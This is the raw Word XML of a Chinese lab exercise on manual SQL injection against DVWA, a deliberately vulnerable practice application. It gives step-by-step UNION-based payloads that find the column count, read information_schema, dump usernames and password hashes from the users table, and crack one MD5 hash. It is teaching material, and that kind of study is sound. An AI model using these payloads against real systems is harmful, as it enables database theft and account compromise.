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CD50" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center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0" w:name="_Toc27095541"/>
      <w:bookmarkStart w:id="1" w:name="_Toc27096312"/>
      <w:bookmarkStart w:id="2" w:name="_Toc9977"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实训22</w:t>
      </w:r>
      <w:r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对DVWA系统进行手工SQL注入实训</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="712C269D" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000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实训目的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D249D9" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:firstLine="7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通过本实训，掌握手工SQL注入的基本方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67EA91" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="center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3" w:name="_Toc27096313"/>
      <w:bookmarkStart w:id="4" w:name="_Toc27095542"/>
      <w:bookmarkStart w:id="5" w:name="_Toc6977"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务1测试和分析页面的功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="409E8342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1．点击“SQL Injection”，这里有一个输入框。根据页面的提示，可以在输入框中输入用户的ID。我们输入“1”之后，点击“Submit”按钮。发现它返回了关于这个User的信息，如图11-10所示。它返回三行数据，第一行是我们输入的内容。第二行是用户名，第三行是用户别名。同时，在浏览器的地址栏，我们发现URL这里有个id=1，这是不是就是我们输入的User ID呢？我们在输入框再输入“2”，发现URL变成了id=2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。我们可以得出这里传进去的id的值是我们可以控制的。我们在输入框中输入的内容，会通过id传进到服务器。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C1E58DD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F69B53B" wp14:editId="355A634A">
            <wp:extent cx="5267325" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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3E09D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图11-10 返回User信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CC811" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="center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6" w:name="_Toc27095543"/>
      <w:bookmarkStart w:id="7" w:name="_Toc27096314"/>
      <w:bookmarkStart w:id="8" w:name="_Toc3519"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务2对参数进行测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7B6416A1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1．对id这个参数进行测试，查看一下它是否存在sql注入漏洞。在输入框里面输入“1'”。发现这里报错了，说sql语句出现了语法错误，如图11-11所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C51267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679FD2F7" wp14:editId="796D39B3">
            <wp:extent cx="4705350" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="0" b="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FD342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图11-11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SQL语法错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F385CA5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可以进行这样一个猜测：这个id是被两个“'”包住的，查询语句可能是这样的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304725B2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select firstname,surname from users where id = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DEBF7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当我们在1之后加一个引号，那么查询语句会变成这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD23573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select firstname,surname from users where id = '1'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64596AFF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可以看到单引号数目不平衡，最后一个引号没被闭合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A99E5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2．多种办法可以消除引号没有被闭合的问题，下面就简单介绍一下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EB730" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="0000000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方法一：可以在原来的基础上再继续输入一个引号，也就是“1''”。这时我们的查询语句为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E693D6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select firstname,surname from users where id = '1''';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC26C0E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方法二：使用“#”符号来注释后面的单引号，这时查询语句将会变成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B843D4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select firstname,surname from users where id = '1'#';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0F07D7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方法三：使用“-- ”。这里注意了“-- ”后面有一个空格。在URL当中，我们可以使用“+”来代替“--”后面的空格。这时查询语句将会变成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC8532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select firstname,surname from users where id = '1'--+';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E8A94" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="0000000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上面显示出来的结果和输入1时一样。到这里我们就可以确定：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697518B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（1）漏洞的参数是“id”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66200C0C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（2）漏洞的类型是字符型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B1E4B" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc27096315"/>
      <w:bookmarkStart w:id="10" w:name="_Toc27095544"/>
      <w:bookmarkStart w:id="11" w:name="_Toc28281"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务3构造payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6C461FB3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确认漏洞之后，就可以构造payload。payload就是一段恶意代码，以便能够获得数据库里面的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B0AFD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1.分析字段数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49217A94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分析字段数，有两种方法。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4686479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方法一：用order by 语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E32E3A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分析字段数的原因是，我们后面需要用union select语句来获得敏感数据。根据order by知识如果后面跟着的数字超出了字段数时，就会报错，通过这个我们可以确定字段数。构造的payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7150B8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1' order by 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F328108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1' order by 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8CCFBF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1' order by 3# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AA2EE" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="0000000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当输入到3的时候，发现它报错了，也就是说字段数为2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441EFBAB" w14:textId="5A9E9FB8" w:rsidR="00247BAA" w:rsidRDefault="00247BA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247BAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12624F28" wp14:editId="38EDFC8C">
            <wp:extent cx="5274310" cy="3049270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="61644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41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5434" w14:textId="65B68598" w:rsidR="00247BAA" w:rsidRPr="00247BAA" w:rsidRDefault="00247BAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247BAA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2630143A" wp14:editId="17BC9635">
            <wp:extent cx="5274310" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="206307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74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8EC7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方法二：用union select来猜测字段数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E874E1F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因为当字段数不对应的时候，它是会发生报错的，构造以下查询语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCCF56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1' union select 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AC214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1' union select 1,2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143436B6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1' union select 1,2,3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D25AAA" w14:textId="77777777" w:rsidR="00247BAA" w:rsidRPr="00247BAA" w:rsidRDefault="00247BAA" w:rsidP="00247B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djustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247BAA">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="D9D9E3" w:frame="1"/>
        </w:rPr>
        <w:t>UNION SELECT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 xml:space="preserve"> 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>用于合并两个查询的结果集。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFFCEE" w14:textId="5B65CCA4" w:rsidR="00247BAA" w:rsidRPr="00247BAA" w:rsidRDefault="00247BAA" w:rsidP="00247B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djustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247BAA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00247BAA">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="D9D9E3" w:frame="1"/>
        </w:rPr>
        <w:t>UNION SELECT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 xml:space="preserve"> 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>语句中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00247BAA">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu Mono" w:eastAsia="宋体" w:hAnsi="Ubuntu Mono" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="D9D9E3" w:frame="1"/>
        </w:rPr>
        <w:t>1,2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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00247BAA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="宋体" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表示在新的查询中选择两个常量值作为新的列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223957F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可以发现，只有输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>union select 1,2 #”的时候没有报错，也就是说字段数为2。同时，我们也注意到，返回的内容中多了三条数据，其实这就是union select出来的数据，如图11-12所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2AF784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6E4B7E69" wp14:editId="613D820C">
            <wp:extent cx="2552700" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="0" b="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63647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图11-12 联合查询返回结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D2BE4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 获取信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9AB76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字段数为2，说明数据列有两列。可以通过union select语句查出两个数据。接下来，我们来获取所需要的数据库里面的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C39B58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（1）获取当前数据库名和当前用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B51C3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构造数据库查询语句如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC9B07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1' union select database(),user()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700438AD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database()将会返回当前网站所使用的数据库名字，user()将会返回进行当前查询的用户名。可以看到当前使用的数据库为：dvwa，当前的用户名：root@localhost，如图11-13所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFF3C95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FB2E299" wp14:editId="5CABD20F">
            <wp:extent cx="3019425" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="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40429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图11-13 返回数据库名和当前用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E05F40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有时候，后面的select语句会限制输出的行数，我们可以让原数据库查询无效，也就是输入无效的id，使得原数据库查询不返回结果。输入如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B30998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-1' union select database(),user()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4BC1EC" w14:textId="2140D857" w:rsidR="0020165A" w:rsidRDefault="0000000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这样就只会返回我们需要的数据了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932544A" w14:textId="4D673612" w:rsidR="0020165A" w:rsidRDefault="0020165A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1B2968" wp14:editId="57A76F57">
            <wp:extent cx="5047615" cy="1654175"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="812944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A44C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version() 获取当前数据库版，@@version_compile_os获取当前操作系统。输入如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DB607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-1' union select version(),@@version_compile_os#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECE9C8" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="7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（2）获取当前的用户表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1832F" w14:textId="6D2392F1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根据上面的信息，我们知道当前数据库名为dvwa，接下来我们要获得表名和字段名以及内容。</w:t>
      </w:r>
      <w:r w:rsidR="0020165A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53616B17" wp14:editId="4857F36F">
            <wp:extent cx="5274310" cy="1522095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="2117363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80A2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你有不懂的字会怎么办呢？对了，查字典。那么Mysql有没有类似于字典的东西呢？答案是肯定的，就是information_schema，这是一个包含了mysql数据库所有信息的“字典”，本质上是一个database，存放着其他各个数据的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332DA989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information_schema里，有tables表和columns表对我们来说非常有用。tables这个表存放的是关于数据库中所有表的信息，里面有个字段叫table_name，还有个字段叫做table_schema。其中table_name是表名，table_schema表示的是这个表所在的数据库。对于columns，它有column_name，table_schema，table_name。回想一下，我们拥有的信息是数据库名。也就是说我们可以构造这样的payload来从数据库里获取一些信息。构造的查询语句如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDA8B5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-1' union select table_name,2 from information_schema.tables where table_schema= '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE33F1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6A6786B" wp14:editId="7B667B15">
            <wp:extent cx="5267325" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="9525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图11-14 返回表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB9F0F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爆出来两个表，如图11-14所示，我们对users表更感兴趣。不是说还有一个columns表么？所以我们还需要table_name以及table_schema来查column_name。这次我们构造的payload如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5901DB9D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-1' union select column_name,2 from information_schema.columns where table_schema= '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' and table_name= 'users'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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752F5B8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这里简单说一下，倘若不指定数据库名为dvwa'，若是其他数据里面也存在users表的话，则会出现很多混淆的数据。当然，在这里直接使用下面的语句也是可以成功的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A96BF7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在这些返回的数据中，我们看到了user，password。这是我们最希望看得的字段，我们再次修改payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F8738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-1' union select user,password from users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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D135ACA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58CC925" wp14:editId="250D554D">
            <wp:extent cx="3705225" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="952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EE382" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="0000000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图11-15 返回用户名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BAA9E5" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00000000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我们爆出所有的用户名和密码值，如图11-15所示。这密码好像有点奇怪，数一数是32位。应该是经过md5加密的。我们需要找一些破解md5值的网站来进行破解可以了。我们对“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gordonb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”用户来进行破解，md5密文为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e99a18c428cb38d5f260853678922e03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。对密文进行解密得到密码是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>abc123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214B4D1" w14:textId="77777777" w:rsidR="00FC497F" w:rsidRDefault="00FC497F"/>
    <w:sectPr w:rsidR="00FC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7B77" w14:textId="77777777" w:rsidR="00EE09CA" w:rsidRDefault="00EE09CA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="712D078D" w14:textId="77777777" w:rsidR="00EE09CA" w:rsidRDefault="00EE09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0188" w14:textId="77777777" w:rsidR="00EE09CA" w:rsidRDefault="00EE09CA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03D09CD1" w14:textId="77777777" w:rsidR="00EE09CA" w:rsidRDefault="00EE09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35155"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA1A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31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97F"/>
    <w:rsid w:val="0020165A"/>
    <w:rsid w:val="00247BAA"/>
    <w:rsid w:val="00682AAC"/>
    <w:rsid w:val="00EE09CA"/>
    <w:rsid w:val="00FC497F"/>
    <w:rsid w:val="64F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334AD"/>
  <w15:docId w15:val="{B9D7F99B-6FA6-48BC-BA2B-13C40D47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3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat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247B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五四 甄</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-10-29T12:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-07T06:00:00Z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C9D1BAEB00394B7AA47D0D3A5F81C027</vt:lpwstr>
  </property>
</Properties>
</file>